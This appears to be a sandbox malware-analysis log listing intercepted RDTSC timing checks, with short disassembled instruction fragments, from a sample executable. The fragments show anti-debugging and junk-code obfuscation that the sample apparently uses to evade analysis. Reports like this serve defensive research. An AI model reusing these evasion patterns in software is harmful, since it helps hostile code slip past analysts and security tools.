                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62C321 second address: 62C33A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62C33A second address: 62C33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E7C5 second address: 62E7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jc 00007F0668FAD200h 0x0000000e jmp 00007F0668FAD1FAh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E7E1 second address: 62E7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 630708 second address: 6307B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f pushad 0x00000010 mov dword ptr [ebp+122D26EFh], edx 0x00000016 jmp 00007F0668FAD1FBh 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F0668FAD1F8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 jmp 00007F0668FAD209h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F0668FAD1F8h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 jmp 00007F0668FAD1FBh 0x0000005e mov dword ptr [ebp+122D206Dh], esi 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 jmp 00007F0668FAD1FFh 0x0000006d pop ecx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6307B5 second address: 6307E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06687C5EFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d je 00007F06687C5EE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631694 second address: 631698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631698 second address: 6316AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EF0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E9DF second address: 62E9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E9E5 second address: 62E9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6317C8 second address: 631801 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0668FAD209h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0668FAD207h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631801 second address: 631805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631805 second address: 63180B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 633686 second address: 63368A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63470F second address: 63476F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 popad 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F0668FAD1F8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F0668FAD1F8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c jl 00007F0668FAD1FEh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63476F second address: 63477F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jo 00007F06687C5EE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 635809 second address: 635824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 635824 second address: 635830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 635830 second address: 63586E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D2910h] 0x0000000d push 00000000h 0x0000000f sub ebx, 52B2748Ah 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F0668FAD1F8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 635ABC second address: 635AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 635AC0 second address: 635ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0668FAD202h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 635ADA second address: 635ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63D040 second address: 63D056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0668FAD1FEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63D056 second address: 63D070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63C79B second address: 63C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63C7A1 second address: 63C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 63C920 second address: 63C92B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64209A second address: 6420D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F06687C5EF1h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F06687C5EF5h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jp 00007F06687C5EEEh 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6473DE second address: 6473E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6473E6 second address: 6473F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F06687C5EE6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6473F5 second address: 647434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0668FAD201h 0x0000001a jc 00007F0668FAD1F6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64780A second address: 64780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64780E second address: 647821 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F0668FAD219h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647821 second address: 647825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647986 second address: 6479D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD208h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0668FAD206h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0668FAD203h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6479D5 second address: 6479DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647B28 second address: 647B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647B30 second address: 647B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647CDC second address: 647CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647CE0 second address: 647CEA instructions: 0x00000000 rdtsc 0x00000002 js 00007F06687C5EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647F7A second address: 647FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F0668FAD1F6h 0x00000010 ja 00007F0668FAD1F6h 0x00000016 popad 0x00000017 jno 00007F0668FAD1FEh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647FA5 second address: 647FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647FAC second address: 647FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 647FB2 second address: 647FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64D4F5 second address: 64D510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0668FAD1FBh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64D510 second address: 64D514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64D514 second address: 64D518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64D518 second address: 64D520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64D660 second address: 64D666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64D666 second address: 64D676 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F06687C5EE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64DA3A second address: 64DA65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD200h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F0668FAD1FCh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64DBBF second address: 64DBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007F06687C5EEAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64DBD2 second address: 64DBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64DBD6 second address: 64DBDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64DBDA second address: 64DC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0668FAD1FFh 0x0000000e jmp 00007F0668FAD204h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64E1BF second address: 64E1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64E1C3 second address: 64E208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0668FAD1FEh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F0668FAD204h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b ja 00007F0668FAD1F6h 0x00000021 jbe 00007F0668FAD1F6h 0x00000027 jng 00007F0668FAD1F6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64E208 second address: 64E20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64E20E second address: 64E21B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64E21B second address: 64E221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 64E540 second address: 64E544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 656993 second address: 65699D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65699D second address: 6569A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655388 second address: 65538D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65538D second address: 6553A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F0668FAD1F6h 0x0000000a jmp 00007F0668FAD1FFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6553A6 second address: 6553C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6553C7 second address: 6553DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0668FAD1FBh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6553DB second address: 6553E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6553E1 second address: 6553F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0668FAD201h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65555F second address: 655571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655571 second address: 6555A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0668FAD1FEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 jmp 00007F0668FAD205h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655744 second address: 65574A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65574A second address: 65574E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6558B8 second address: 6558BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6558BC second address: 6558E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jno 00007F0668FAD218h 0x0000000d jmp 00007F0668FAD204h 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655B4F second address: 655B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655E1A second address: 655E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655E23 second address: 655E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655E2B second address: 655E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 655FB9 second address: 655FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 656308 second address: 65630C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65630C second address: 656312 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6567F0 second address: 656806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F0668FAD1F6h 0x0000000c jo 00007F0668FAD1F6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65EACC second address: 65EAD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65EAD5 second address: 65EADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
